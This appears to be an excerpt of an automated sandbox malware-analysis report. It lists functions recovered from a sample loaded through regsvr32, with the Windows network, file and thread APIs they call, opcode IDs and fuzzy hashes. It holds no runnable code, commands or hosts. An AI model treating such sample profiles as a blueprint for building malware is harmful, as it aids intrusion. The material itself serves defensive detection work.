                                                                                                                                                • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ConnectInternet
                                                                                                                                                • String ID: :G?$C
                                                                                                                                                • API String ID: 3050416762-1225920220
                                                                                                                                                • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                                • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                                                                                                • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                                • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID: gF\
                                                                                                                                                • API String ID: 823142352-1982329323
                                                                                                                                                • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                                • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                                                                                                • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                                • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HttpOpenRequest
                                                                                                                                                • String ID: :G?
                                                                                                                                                • API String ID: 1984915467-1508054202
                                                                                                                                                • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                                • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                                                                                                • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                                • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                • String ID: :G?
                                                                                                                                                • API String ID: 2038078732-1508054202
                                                                                                                                                • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                                • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                                                                                                • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                                • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                                • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                                                                                                • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                                • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                                • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                                • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                                                                                                • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                                • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%